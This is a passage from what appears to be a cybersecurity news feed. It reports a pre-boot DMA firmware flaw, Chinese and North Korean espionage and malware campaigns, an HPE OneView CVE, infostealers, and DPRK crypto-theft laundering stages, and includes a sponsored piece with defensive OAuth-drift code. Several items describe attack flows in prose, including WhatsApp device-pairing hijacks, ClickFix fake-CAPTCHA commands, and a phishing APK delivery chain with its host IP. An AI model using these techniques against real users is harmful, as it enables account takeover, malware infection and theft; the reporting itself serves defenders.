Riot Games, in a separate post, said the critical flaw could be exploited for injecting code, adding how the privileged state associated with the early boot sequence can be manipulated before the operating system running on the machine can activate its security controls. “This issue allowed hardware cheats to potentially inject code unnoticed, even when security settings on the host appeared to be enabled,” Al-Sharifi said, describing it as a “Sleeping Bouncer” problem. While Pre-Boot DMA Protection is designed as a way to prevent rogue DMA access to a system’s memory using IOMMU early on in the boot sequence, the vulnerability stems from the firmware incorrectly signaling to the operating system that this feature was fully active, when it was failing to initialize the IOMMU correctly during early boot. “This meant that while ‘Pre-Boot DMA Protection’ settings appeared to be enabled in the BIOS, the underlying hardware implementation wasn’t fully initializing the IOMMU during the earliest seconds of the boot process,” Al-Sharifi added.

“In essence, the system’s ‘bouncer’ appeared to be on duty, but was actually asleep in the chair. So by the time the system is fully loaded, it can’t be 100% confident that zero integrity-breaking code was injected via DMA.” This brief exploitation window can pave the way for a “sophisticated hardware cheat” to get in, gain elevated privileges, and conceal itself without raising any red flags. “By closing this pre-boot loophole, we are neutralizing an entire class of previously untouchable cheats and significantly raising the cost of unfair play,” Riot Games noted. Although the vulnerability has been framed from the point of view of the gaming sector, the security risk extends to any attack that can abuse the physical access to inject malicious code.


China-Aligned Threat Group Uses Windows Group Policy to Deploy Espionage Malware

A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. The end goal of these attacks is cyber espionage, Slovak cybersecurity company ESET said in a report published today. The threat activity cluster has been assessed to be active since at least September 2023. “LongNosedGoblin uses Group Policy to deploy malware across the compromised network, and cloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C&C) servers,” security researchers Anton Cherepanov and Peter Strýček said.

Group Policy is a mechanism for managing settings and permissions on Windows machines. According to Microsoft, Group Policy can be used to define configurations for groups of users and client computers, as well as manage server computers. The attacks are characterized by the use of a varied custom toolset that mainly consists of C#/.NET applications:

- NosyHistorian, to collect browser history from Google Chrome, Microsoft Edge, and Mozilla Firefox
- NosyDoor, a backdoor that uses Microsoft OneDrive as C&C and executes commands that allow it to exfiltrate files, delete files, and execute shell commands
- NosyStealer, to exfiltrate browser data from Google Chrome and Microsoft Edge to Google Drive in the form of an encrypted TAR archive
- NosyDownloader, to download and run a payload in memory, such as NosyLogger
- NosyLogger, a modified version of DuckSharp that’s used to log keystrokes

[Figure: NosyDoor execution chain]

ESET said it first detected activity associated with the hacking group in February 2024 on a system of a governmental entity in Southeast Asia, eventually finding that Group Policy was used to deliver the malware to multiple systems from the same organization. The exact initial access methods used in the attacks are presently unknown.

“In most cases we investigated, the attackers were already inside the network, so we could not determine the initial access method they used,” Cherepanov, a senior malware researcher at ESET, told The Hacker News. Further analysis has determined that while many victims were affected by NosyHistorian between January and March 2024, only a subset of these victims were infected with NosyDoor, indicating a more targeted approach. In some cases, the dropper used to deploy the backdoor using AppDomainManager injection has been found to contain “execution guardrails” that are designed to limit operation to specific victims’ machines. Also employed by LongNosedGoblin are other tools like a reverse SOCKS5 proxy, a utility that’s used to run a video recorder to capture audio and video, and a Cobalt Strike loader.

The cybersecurity company noted that the threat actor’s tradecraft shares tenuous overlaps with clusters tracked as ToddyCat and Erudite Mogwai, but emphasized the lack of definitive evidence linking them together. That said, the similarities between NosyDoor and LuckyStrike Agent and the presence of the phrase “Paid Version” in the PDB path of LuckyStrike Agent have raised the possibility that the malware may be sold or licensed to other threat actors. “We later identified another instance of a NosyDoor variant targeting an organization in an E.U. country, once again employing different TTPs, and using the Yandex Disk cloud service as a C&C server,” the researchers noted.

“The use of this NosyDoor variant suggests that the malware may be shared among multiple China-aligned threat groups.”

HPE OneView Flaw Rated CVSS 10.0 Allows Unauthenticated Remote Code Execution

Hewlett Packard Enterprise (HPE) has resolved a maximum-severity security flaw in OneView Software that, if successfully exploited, could result in remote code execution. The critical vulnerability, assigned the CVE identifier CVE-2025-37164, carries a CVSS score of 10.0. HPE OneView is an IT infrastructure management software that streamlines IT operations and controls all systems via a centralized dashboard interface.

“A potential security vulnerability has been identified in Hewlett Packard Enterprise OneView Software. This vulnerability could be exploited, allowing a remote unauthenticated user to perform remote code execution,” HPE said in an advisory issued this week. It affects all versions of the software prior to version 11.00, which addresses the flaw. The company has also made available a hotfix that can be applied to OneView versions 5.20 through 10.20. It’s worth noting that the hotfix must be reapplied after upgrading from version 6.60 or later to version 7.00.00, or after any HPE Synergy Composer reimaging operations.

Separate hotfixes are available for the OneView virtual appliance and Synergy Composer2. Although HPE makes no mention of the flaw being exploited in the wild, it’s essential that users apply the patches as soon as possible for optimal protection. Earlier this June, the company also released updates to fix eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. It also shipped OneView version 10.00 to remediate a number of known flaws in third-party components, such as Apache Tomcat and Apache HTTP Server.


This week’s ThreatsDay Bulletin tracks how attackers keep reshaping old tools and finding new angles in familiar systems. Small changes in tactics are stacking up fast, and each one hints at where the next big breach could come from. From shifting infrastructures to clever social hooks, the week’s activity shows just how fluid the threat landscape has become. Here’s the full rundown of what moved in the cyber world this week.

International scam ring busted: Fraudulent Call Centers Disrupted in Ukraine

Authorities from the Czech Republic, Latvia, Lithuania, and Ukraine, along with Eurojust, took action against a criminal network operating call centers in Dnipro, Ivano-Frankivsk, and Kyiv that scammed more than 400 victims across Europe out of more than €10 million ($11.7 million). “The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam,” Eurojust said. “The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked. They convinced their victims to transfer large sums of money from their ‘compromised’ bank accounts to ‘safe’ bank accounts controlled by the network. They also lured victims into downloading remote access software and entering their banking details, enabling the criminal group to access and control the victims’ bank accounts.”

The call centers employed approximately 100 people, who were recruited from the Czech Republic, Latvia, Lithuania, and other countries. They played different roles, ranging from making calls and forging official certificates from the police and banks to collecting cash from their victims. Employees who successfully managed to obtain money from their victims would receive up to 7% of the proceeds to encourage them to continue the scam. The criminal enterprise also promised cash bonuses, cars, or apartments in Kyiv for employees who obtained more than €100,000. The operation led to the arrest of 12 suspects on December 9, 2025. Authorities also seized cash, 21 vehicles, and various weapons and ammunition.

UK nudity filter push: U.K. to Encourage Apple and Google to Put Nudity-Blocking Systems on Phones

The U.K. government reportedly will “encourage” Apple and Google to prevent phones from displaying nude images except when users verify that they are adults. According to a new report from The Financial Times, the push for nudity-detection won’t be a legal requirement “for now,” but is said to be part of the government’s strategy to tackle violence against women and girls. “The U.K. government wants technology companies to block explicit images on phones and computers by default to protect children, with adults having to verify their age to create and access such content,” the report said. “Ministers want the likes of Apple and Google to incorporate nudity-detection algorithms into their device operating systems to prevent users from taking photos or sharing images of genitalia unless they are verified as adults.”

Modular infostealer emerges: New SantaStealer Spotted

A new, modular information stealer named SantaStealer is being advertised by Russian-speaking operators on Telegram and underground forums like Lolz. “The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection,” Rapid7 said. “Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP.” SantaStealer uses 14 distinct data-collection modules, each running in its own thread and exfiltrating the stolen information. It also uses an embedded DLL to bypass Chrome’s app-bound encryption protections and harvest browser credentials, including passwords, cookies, and saved credit cards from the web browser.

Assessed to be a rebranding of BluelineStealer, the malware is available for $175 per month for a basic plan and $300 per month for a premium plan that lets customers edit execution delays and enable clipper functionality to substitute wallet addresses copied to the clipboard with an attacker-controlled one to reroute transactions. The threat actor has been active on Telegram since at least July 2025.

Bulletproof hosting exposed: Deep Dive on BPH Providers

Threat actors leveraging Bulletproof Hosting (BPH) providers move faster than defenders can respond, often migrating operations, re-registering domains, and re-establishing services within hours of takedowns, Silent Push said in a new exhaustive analysis of BPH services. “Without knowledge of where this infrastructure shifts, takedowns lack the permanence they need,” Silent Push said. “And without a coordinated shift in both regulatory pressure and the law-enforcement action aimed at these providers, […] Bulletproof Hosting as a service will continue to thrive – as will the malicious operations built on top of it.”

C2 servers tracked: DDoSia Infrastructure Analysis

An analysis of DDoSia’s multi-layered command-and-control (C2) infrastructure has revealed an average of 6 control servers active at any given time. “However, servers typically have a relatively short lifespan — averaging 2.53 days,” Censys said. “Some servers we have observed are active for over a week, but most instances we only see for less than a few hours.” DDoSia is a participatory distributed denial-of-service (DDoS) capability built by Russian hacktivists in 2022, coinciding with the early days of the Russo-Ukrainian war. It’s operated by the pro-Russian hacktivist group NoName057(16), which was taken down earlier this July. It has since made a comeback. Targeting of DDoSia is heavily focused on Ukraine, European allies, and NATO states in government, military, transportation, public utilities, financial, and tourism sectors.

WhatsApp hijack campaign: GhostPairing Attack Hijacks WhatsApp Accounts

Threat actors are using a new social engineering technique to hijack WhatsApp accounts. The new GhostPairing attack lures victims by sending messages from compromised accounts that contain a link to a Facebook-style preview. Clicking on the link takes the victim to a page that imitates a Facebook viewer and asks them to verify before the content can be served. As part of this step, they are asked to scan a QR code that will link an attacker’s browser to the victim’s WhatsApp account, granting them unauthorized access to the victim’s account. “To abuse this flow, an attacker would open WhatsApp Web in their own browser, capture the QR code shown there, and embed it into the fake Facebook viewer page. The victim would then be told to open WhatsApp, go to Linked devices, and scan that QR in order to ‘view the photo,’” Gen Digital said.

Alternatively, they are instructed to enter their phone number on the bogus page, which then forwards that number to WhatsApp’s legitimate “link device via phone number” feature. Once WhatsApp generates a pairing numeric code, it’s relayed back to the fake page, along with instructions to enter the code into WhatsApp to confirm a login. The earliest sightings of the attack have been detected in Czechia. The attack, which abuses the legitimate device-linking feature on the platform, is a variation of a technique that was used by Russian state-sponsored actors to intercept Signal and WhatsApp messages earlier this year. To check for any signs of compromise, users can navigate to Settings -> Linked Devices.

RuTube malware lure: RuTube Becomes a Vector for Malware Distribution

Bad actors have been observed hosting videos on the Russian video-sharing platform RuTube that advertise cheats for Roblox, tricking users into clicking on links that lead to Trojan and stealer malware like Salat Stealer. It’s worth noting that similar tactics have been widespread on YouTube.

Legacy cipher retired: Microsoft Plans RC4 Deprecation

Microsoft has announced that it’s deprecating RC4 (Rivest Cipher 4) encryption in Kerberos to strengthen Windows authentication. By mid-2026, domain controller defaults will be updated for the Kerberos Key Distribution Center (KDC) on Windows Server 2008 and later to only allow AES-SHA1 encryption. RC4 will be disabled by default and only used in scenarios where a domain administrator explicitly configures an account or the KDC to use it. “RC4, once a staple for compatibility, is susceptible to attacks like Kerberoasting that can be used to steal credentials and compromise networks,” the company said. “It is crucial to discontinue using RC4.” The decision also comes after U.S. Senator Ron Wyden called on the U.S. Federal Trade Commission (FTC) to investigate the company over its use of the obsolete cipher.

IMSI catcher arrests: Serbia Detains 2 Chinese Nationals for Smishing Attacks

Serbian police have detained two Chinese nationals for driving around with an improvised IMSI catcher in their car that functioned as a fake mobile base station. The pair is alleged to have sent SMS phishing messages that tricked people into visiting phishing sites that masqueraded as mobile operators, government portals, and large companies to collect payment card details. The captured card data was later abused overseas to pay for goods and services. The names of the arrested individuals were not disclosed. But they are suspected to be part of an organized criminal group.

Exposed AI servers risk: About 1K Exposed MCP Servers Found

New research from Bitsight has found roughly 1,000 Model Context Protocol (MCP) servers exposed on the internet with no authorization in place and leaking sensitive data. Some of them could allow management of a Kubernetes cluster and its pods, access to a Customer Relationship Management (CRM) tool, send WhatsApp messages, and even achieve remote code execution. “While Anthropic authored the MCP specification, it’s not their job to enforce how every server handles authorization,” Bitsight said. “Because authorization is optional, it’s easy to skip it when moving from a demo to a real-world deployment, potentially exposing sensitive tools or data. Many MCP servers are designed for local use, but once one is exposed over HTTP, the attack surface expands dramatically.” To counter the risk, it’s essential that users do not expose MCP servers unless it’s absolutely necessary and implement OAuth protections for authorization.

The development comes as exposure management company Intruder revealed that a scan of approximately 5 million single-page applications found more than 42,000 tokens exposed in their code. The tokens span 334 types of secrets.

Fake tax scam deploys RATs: Tax-Themed Phishing Campaign Delivers RATs

A phishing campaign impersonating the Income Tax Department of India has been found using themes related to alleged tax irregularities to create a false sense of urgency and deceive users into clicking on malicious links that deploy legitimate remote access tools like LogMeIn Resolve (formerly GoTo Resolve) that grant attackers unauthorized control over compromised systems. “The campaign delivered a two-stage malware chain consisting of a shellcode-based RAT loader packaged in a ZIP file and a rogue remote administration executable disguised as a GoTo Resolve updater,” Raven AI said. “Traditional Secure Email Gateway defenses failed to detect these messages because the sender authenticated correctly, the attachments were password-protected, and the content imitated real government communication.”

CBI busts SMS scam ring: India’s CBI Dismantles Phishing SMS Factory

India’s Central Bureau of Investigation (CBI) said it disrupted a large cyber fraud setup that was being used to send phishing messages across the country with the goal of tricking people into bogus schemes like fake digital arrests, loan scams, and investment frauds. Three people have been arrested in connection with the case under Operation Chakra V. The investigation identified an organized cyber gang operating from the National Capital Region (NCR) and the Chandigarh area that managed to obtain around 21,000 SIM cards in violation of the Department of Telecommunications (DoT) rules. “This gang was providing bulk SMS services to cyber criminals,” the CBI said. “It was found that even foreign cyber criminals were using this service to cheat Indian citizens. These SIM cards were controlled through an online platform to send bulk messages. The messages offered fake loans, investment opportunities, and other financial benefits, with the aim of stealing personal and banking details of innocent people.”

Separately, the agency also filed charges against 17 individuals, including four foreign nationals and 58 companies, in connection with an organized transnational cyber fraud network operating across multiple States in India. “The cyber criminals adopted a highly layered and technology-driven modus operandi, involving the use of Google advertisements, bulk SMS campaigns, SIM box-based messaging systems, cloud infrastructure, fintech platforms, and multiple mule bank accounts,” the CBI said. “Each stage of the operation—from luring victims to collection and movement of funds—was deliberately structured to conceal the identities of the actual controllers and evade detection by law enforcement agencies.”

APT phishing across Europe: Russian Hackers Phish the Baltics and the Balkans

StrikeReady Labs has disclosed details of a phishing campaign that has targeted Transnistria’s governing body with a credential phishing email attachment by spoofing the Pridnestrovian Moldavian Republic. The HTML attachment shows a blurred decoy document along with a pop-up that prompts victims to enter their credentials. The entered information is transmitted to an attacker-controlled server. The campaign is believed to have been active since at least 2023. Other targets likely include entities in Ukraine, Bosnia and Herzegovina, Macedonia, Montenegro, Spain, Lithuania, Bulgaria, and Moldova.

Fake CAPTCHA delivers malware: ClickFix Attacks Use Finger Tool

A new wave of ClickFix attacks has leveraged fake CAPTCHA checks that trick users into pasting a command into the Windows Run dialog, which runs the finger.exe tool to retrieve malicious PowerShell code. The attacks have been attributed to clusters tracked as KongTuke and SmartApeSG. The decades-old finger command is used to look up information about local and remote users on Unix and Linux systems via the Finger protocol. It was later added to Windows systems. In another ClickFix attack detected by Point Wild, phony browser notifications prompt users to click “How to fix” or copy-paste a PowerShell command that leads to the deployment of DarkGate malware via a malicious HTA file.

Google service abused: Phishing Attack Abuses Google Application Integration Service for Credential Theft

Threat actors are abusing Google’s Application Integration service to send phishing emails from authentic @google.com addresses and bypass SPF, DKIM, and DMARC checks. The technique, according to xorlab, is being used in the wild to target organizations with highly convincing lures mimicking new sign-in alerts for Google accounts, effectively deceiving them into clicking on suspicious links. “To evade detection, attackers use multi-hop redirect chains that bounce through multiple legitimate services,” the company said. “Each hop uses trusted infrastructure — Google, Microsoft, AWS – making the attack difficult to detect or block at any single point. Regardless of the entry point, victims eventually land on the Microsoft 365 login page, revealing the attackers’ primary target: M365 credentials.”

AI-driven ICS scans: Reconnaissance Efforts Target Modbus Devices

Cato Networks said it observed large-scale reconnaissance and exploitation attempts targeting Modbus devices, including string monitoring boxes that directly control solar panel output. “In such cases, a threat actor with nothing more than an internet connection and a free tool could issue a simple command, ‘SWITCH OFF,’ cutting power on a bright, cloudless day,” the company said. “What once required time, patience, and manual skill can now be scaled and accelerated through automation. With the rise of agentic AI tools, attackers can now automate reconnaissance and exploitation, reducing the time needed to execute such attacks from days to just minutes.”

Ransomware joins exploit wave: React2Shell Exploited in Ransomware Attacks

The fallout from React2Shell (CVE-2025-55182) has continued to spread as multiple threat actors have jumped on the exploitation bandwagon to distribute a wide array of malware. The proliferation of public exploits and stealth backdoors has been complemented by attacks of varying origins and motivations, with cybersecurity firm S-RM revealing that the vulnerability was used as an initial access vector in a Weaxor ransomware attack on December 5, 2025. “This marks a shift from previously reported exploitation,” S-RM said. “It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion.”

Weaxor is assessed to be a rebrand of Mallox ransomware. The ransomware binary was dropped and executed on the system within less than one minute of initial access, indicating that this was likely part of an automated campaign. According to Palo Alto Networks Unit 42, more than 60 organizations have been impacted by incidents exploiting the vulnerability. Microsoft said it found “several hundred machines across a diverse set of organizations” that were compromised via React2Shell.

The patterns behind these stories keep repeating — faster code, smarter lures, and fewer pauses between discovery and abuse. Each case adds another piece to the wider map of how attacks adapt when attention fades. Next week will bring a fresh set of shifts, but for now, these are the signals worth noting. Stay sharp, connect the dots, and watch what changes next.

That’s all for this edition of the ThreatsDay Bulletin — the pulse of what’s moving beneath the surface every Thursday.

North Korea-Linked Hackers Steal $2.02 Billion in 2025, Leading Global Crypto Theft

Threat actors with ties to the Democratic People’s Republic of Korea (DPRK or North Korea) have been instrumental in driving a surge in global cryptocurrency theft in 2025, accounting for at least $2.02 billion out of more than $3.4 billion stolen from January through early December. The figure represents a 51% increase year-over-year and $681 million more than 2024, when the threat actors stole $1.3 billion, according to Chainalysis’ Crypto Crime Report shared with The Hacker News. “This marks the most severe year on record for DPRK crypto theft in terms of value stolen, with DPRK attacks also accounting for a record 76% of all service compromises,” the blockchain intelligence company said. “Overall, 2025’s numbers bring the lower-bound cumulative estimate for cryptocurrency funds stolen by the DPRK to $6.75 billion.” The February compromise of cryptocurrency exchange Bybit alone is responsible for $1.5 billion of the $2.02 billion plundered by North Korea.

The attack was attributed to a threat cluster known as TraderTraitor (aka Jade Sleet and Slow Pisces). An analysis published by Hudson Rock earlier this month linked a machine infected with Lumma Stealer to infrastructure associated with the Bybit hack based on the presence of the email address “trevorgreer9312@gmail[.]com.” The cryptocurrency thefts are part of a broader series of attacks conducted by the North Korea-backed hacking group called Lazarus Group over the past decade. The adversary is also believed to be involved in the theft of $36 million worth of cryptocurrency from South Korea’s largest cryptocurrency exchange, Upbit, last month. Lazarus Group is affiliated with Pyongyang’s Reconnaissance General Bureau (RGB).

It’s estimated to have siphoned no less than $200 million from over 25 cryptocurrency heists between 2020 and 2023. The nation-state adversary is one of the most prolific hacking groups that also has a track record of orchestrating a long-running campaign referred to as Operation Dream Job, in which prospective employees working in defense, manufacturing, chemical, aerospace, and technology sectors are approached via LinkedIn or WhatsApp with lucrative job opportunities to trick them into downloading and running malware such as BURNBOOK, MISTPEN, and BADCALL, the last of which also comes in a Linux version. The end goal of these efforts is two-pronged: to collect sensitive data and generate illicit revenue for the regime in violation of international sanctions imposed on the country. A second approach adopted by North Korean threat actors is to embed information technology (IT) workers inside companies across the world under false pretenses, either in an individual capacity or through front companies like DredSoftLabs and Metamint Studio that are set up for this purpose.

This also includes gaining privileged access to crypto services and enabling high‑impact compromises. The fraudulent operation has been nicknamed Wagemole. “Part of this record year likely reflects an expanded reliance on IT worker infiltration at exchanges, custodians, and Web3 firms, which can accelerate initial access and lateral movement ahead of large‑scale theft,” Chainalysis said. Regardless of the method used, the stolen funds are routed through Chinese-language money movement and guarantee services, as well as cross-chain bridges, mixers, and specialized marketplaces like Huione to launder the proceeds.

What’s more, the pilfered assets follow a structured, multi-wave laundering pathway that unfolds over approximately 45 days following the hacks:

- Wave 1: Immediate Layering (Days 0-5), which involves immediate distancing of funds from the theft source using DeFi protocols and mixing services
- Wave 2: Initial Integration (Days 6-10), which involves shifting the funds to cryptocurrency exchanges, second-tier mixing services, and cross-chain bridges like XMRt
- Wave 3: Final Integration (Days 20-45), which involves using services that facilitate ultimate conversion to fiat currency or other assets

“Their heavy use of professional Chinese-language money laundering services and over-the-counter (OTC) traders suggests that DPRK threat actors are tightly integrated with illicit actors across the Asia-Pacific region, and is consistent with Pyongyang’s historical use of China-based networks to gain access to the international financial system,” the company said.

The disclosure comes as Minh Phuong Ngoc Vong, a 40-year-old Maryland man, has been sentenced to 15 months in prison for his role in the IT worker scheme by allowing North Korean nationals based in Shenyang, China, to use his identity to land jobs at several U.S. government agencies, per the U.S. Department of Justice (DoJ). Between 2021 and 2024, Vong used fraudulent misrepresentations to obtain employment with at least 13 different U.S. companies, including landing a contract at the Federal Aviation Administration (FAA). In all, Vong was paid more than $970,000 in salary for software development services that were carried out by overseas conspirators.

“Vong conspired with others, including John Doe, aka William James, a foreign national living in Shenyang, China, to defraud U.S. companies into hiring Vong as a remote software developer,” the DoJ said. “After securing these jobs through materially false statements about his education, training, and experience, Vong allowed Doe and others to use his computer access credentials to perform the remote software development work and receive payment for that work.”

The IT worker scheme appears to be undergoing a shift in strategy, with DPRK-linked actors increasingly acting as recruiters to enlist collaborators through platforms like Upwork and Freelancer to further scale the operations. “These recruiters approach targets with a scripted pitch, requesting ‘collaborators’ to help bid on and deliver projects. They provide step-by-step instructions for account registration, identity verification, and credential sharing,” Security Alliance said in a report published last month.

“In many cases, victims ultimately surrender full access to their freelance accounts or install remote-access tools such as AnyDesk or Chrome Remote Desktop. This enables the threat actor to operate under the victim’s verified identity and IP address, allowing them to bypass platform verification controls and conduct illicit activity undetected.”

The Case for Dynamic AI-SaaS Security as Copilots Scale

Within the past year, artificial intelligence copilots and agents have quietly permeated the SaaS applications businesses use every day. Tools like Zoom, Slack, Microsoft 365, Salesforce, and ServiceNow now come with built-in AI assistants or agent-like features. Virtually every major SaaS vendor has rushed to embed AI into their offerings. The result is an explosion of AI capabilities across the SaaS stack, a phenomenon of AI sprawl where AI tools proliferate without centralized oversight.

For security teams, this represents a shift. As these AI copilots scale up in use, they are changing how data moves through SaaS. An AI agent can connect multiple apps and automate tasks across them, effectively creating new integration pathways on the fly. An AI meeting assistant might automatically pull in documents from SharePoint to summarize in an email, or a sales AI might cross-reference CRM data with financial records in real time.

These AI data connections form complex, dynamic pathways that traditional static app models never had.

When AI Blends In - Why Traditional Governance Breaks

This shift has exposed a fundamental weakness in legacy SaaS security and governance. Traditional controls assumed stable user roles, fixed app interfaces, and human-paced changes. However, AI agents break those assumptions.

They operate at machine speed, traverse multiple systems, and often wield higher-than-usual privileges to perform their job. Their activity tends to blend into normal user logs and generic API traffic, making it hard to distinguish an AI’s actions from a person’s. Consider Microsoft 365 Copilot: when this AI fetches documents that a given user wouldn’t normally see, it leaves little to no trace in standard audit logs. A security admin might see an approved service account accessing files, and not realize it was Copilot pulling confidential data on someone’s behalf.

Similarly, if an attacker hijacks an AI agent’s token or account, they can quietly misuse it. Moreover, AI identities don’t behave like human users at all. They don’t fit neatly into existing IAM roles, and they often require very broad data access to function (far more than a single user would need). Traditional data loss prevention tools struggle because once an AI has wide read access, it can potentially aggregate and expose data in ways no simple rule would catch.

Permission drift is another challenge. In a static world, you might review integration access once a quarter. But AI integrations can change capabilities or accumulate access quickly, outpacing periodic reviews. Access often drifts silently when roles change or new features turn on.

A scope that seemed safe last week might quietly expand (e.g., an AI plugin gaining new permissions after an update) without anyone realizing. All these factors mean static SaaS security and governance tools are falling behind. If you’re only looking at static app configurations, predefined roles, and after-the-fact logs, you can’t reliably tell what an AI agent actually did, what data it accessed, which records it changed, or whether its permissions have outgrown policy in the interim.

A Checklist for Securing AI Copilots and Agents

Before introducing new tools or frameworks, security teams should pressure-test their current posture.

- Do we know every copilot, agent, and integration running in our SaaS environment?
- Do we know what each one can access right now?
- Can we see what each one actually did across apps?
- Can we spot access drift as it happens?
- If something goes wrong, can we reconstruct what happened end to end?
- Can we block risky actions in real time, not just alert after?
- Do we know which OAuth tokens exist and what scopes they grant?
- Can we tell human activity from agent activity in logs?

If several of these questions are difficult for you to answer, it’s a signal that static SaaS security models are no longer sufficient for AI tools.

Dynamic AI-SaaS Security - Guardrails for AI Apps

To address these gaps, security teams are beginning to adopt what can be described as dynamic AI-SaaS security. In contrast to static security (which treats apps as siloed and unchanging), dynamic AI-SaaS security is a policy-driven, adaptive guardrail layer that operates in real time on top of your SaaS integrations and OAuth grants. Think of it as a living security layer that understands what your copilots and agents are doing moment-to-moment, and adjusts or intervenes according to policy.
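Two of the checklist questions above (which OAuth tokens exist and what scopes they grant, and whether access drift can be spotted as it happens) come down to diffing successive grant inventories against an approved baseline. The following is an added example, not code from the article or from any vendor; the record fields, app names and scope strings are constructed for illustration.

```python
from dataclasses import dataclass

# Assumed policy baseline: the scopes each integration is approved to hold.
APPROVED = {
    "meeting-assistant": {"calendar.read", "files.read"},
    "sales-copilot": {"crm.read"},
}

# Constructed inventories, one record per OAuth grant (field names are assumptions).
LAST_WEEK = [
    {"app": "meeting-assistant", "user": "alice", "scopes": ["calendar.read"]},
    {"app": "sales-copilot", "user": "bob", "scopes": ["crm.read"]},
]
TODAY = [
    {"app": "meeting-assistant", "user": "alice", "scopes": ["calendar.read", "files.read"]},
    {"app": "meeting-assistant", "user": "carol", "scopes": ["calendar.read", "mail.send"]},
    {"app": "sales-copilot", "user": "bob", "scopes": ["crm.read"]},
    {"app": "notes-summarizer", "user": "dave", "scopes": ["files.read.all"]},
]

@dataclass(frozen=True)
class Finding:
    app: str
    kind: str            # "unknown_app", "scope_added" or "over_baseline"
    scopes: frozenset

def effective_access(snapshot):
    """An app's effective access is the union of scopes over all of its grants."""
    merged = {}
    for grant in snapshot:
        merged.setdefault(grant["app"], set()).update(grant["scopes"])
    return merged

def detect_drift(previous, current, approved=APPROVED):
    """Compare two inventories and the baseline; return findings sorted by app."""
    prev, cur = effective_access(previous), effective_access(current)
    findings = []
    for app, scopes in sorted(cur.items()):
        if app not in approved:
            findings.append(Finding(app, "unknown_app", frozenset(scopes)))
            continue
        added = scopes - prev.get(app, set())
        if added:        # changed since the last snapshot, even if still approved
            findings.append(Finding(app, "scope_added", frozenset(added)))
        excess = scopes - approved[app]
        if excess:       # outside policy, whether or not it is new
            findings.append(Finding(app, "over_baseline", frozenset(excess)))
    return findings
```

Keeping `scope_added` and `over_baseline` separate distinguishes a change that is still within policy from standing access that was never approved.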

Dynamic AI-SaaS security monitors AI agent activity across all your SaaS apps, watching for policy violations, abnormal behavior, or signs of trouble. Rather than relying on yesterday’s checklist of permissions, it learns and adapts to how an agent is actually being used. A dynamic security platform will track an AI agent’s effective access. If the agent suddenly touches a system or dataset outside its usual scope, it can flag or block that in real time.

It can also detect configuration drift or privilege creep instantly and alert teams before an incident occurs. Another hallmark of dynamic AI-SaaS security is visibility and auditability. Because the security layer mediates the AI’s actions, it keeps a detailed record of what the AI is doing across systems. Every prompt, every file accessed, and every update made by the AI can be logged in structured form.

This means that if something does go wrong, say an AI makes an unintended change or accesses a forbidden file, the security team can trace exactly what happened and why. Dynamic AI-SaaS security platforms leverage automation and AI themselves to keep up with the torrent of events. They learn normal patterns of agent behavior and can prioritize true anomalies or risks so that security teams aren’t drowning in alerts. They might correlate an AI’s actions across multiple apps to understand the context and flag only genuine threats.

This proactive stance helps catch issues that traditional tools would miss, whether it’s a subtle data leak via an AI or a malicious prompt injection causing an agent to misbehave.

Conclusion - Embracing Adaptive Guardrails

As AI copilots take on a bigger role in our SaaS workflows, security teams should think about evolving their strategy in parallel. The old model of set-and-forget SaaS security, with static roles and infrequent audits, simply can’t keep up with the speed and complexity of AI activity. The case for dynamic AI-SaaS security is ultimately about maintaining control without stifling innovation.

With the right dynamic security platform in place, organizations can confidently adopt AI copilots and integrations, knowing they have real-time guardrails to prevent misuse, catch anomalies, and enforce policy. Dynamic AI-SaaS security platforms (like Reco) are emerging to deliver these capabilities out-of-the-box, from monitoring of AI privileges to automated incident response. They act as that missing layer on top of OAuth and app integrations, adapting on the fly to what agents are doing and ensuring nothing falls through the cracks.

Figure 1: Reco’s generative AI application discovery

For security leaders watching the rise of AI copilots, SaaS security can no longer be static.

By embracing a dynamic model, you equip your organization with living guardrails that let you ride the AI wave safely. It’s an investment in resilience that will pay off as AI continues to transform the SaaS ecosystem. Interested in how dynamic AI-SaaS security could work for your organization? Consider exploring platforms like Reco that are built to provide this adaptive guardrail layer.

This article is a contributed piece from one of our valued partners.

Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App

The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). “The threat actor leveraged QR codes and notification pop-ups to lure victims into installing and executing the malware on their mobile devices,” ENKI said. “The malicious app decrypts an embedded encrypted APK and launches a malicious service that provides RAT capabilities.” “Since Android blocks apps from unknown sources and displays security warnings by default, the threat actor claims the app is a safe, official release to trick victims into ignoring the warning and installing the malware.”

According to the South Korean cybersecurity company, some of these artifacts masquerade as package delivery service apps. It’s being assessed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps.

A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status. The QR code is engineered to redirect the user to a “tracking.php” script that implements server-side logic to check the User-Agent string of the browser and display a message urging them to install a security module under the guise of verifying their identity due to supposed “international customs security policies.” Should the victim proceed to install the app, an APK package (“SecDelivery.apk”) is downloaded from the server (“27.102.137[.]181”). The APK file then decrypts and loads an encrypted APK embedded into its resources to launch the new version of DocSwap, but not before ascertaining that it has obtained the necessary permission to read and manage external storage, access the internet, and install additional packages. “Once it confirms all permissions, it immediately registers the MainService of the newly loaded APK as ‘com.delivery.security.MainService,’” ENKI said.

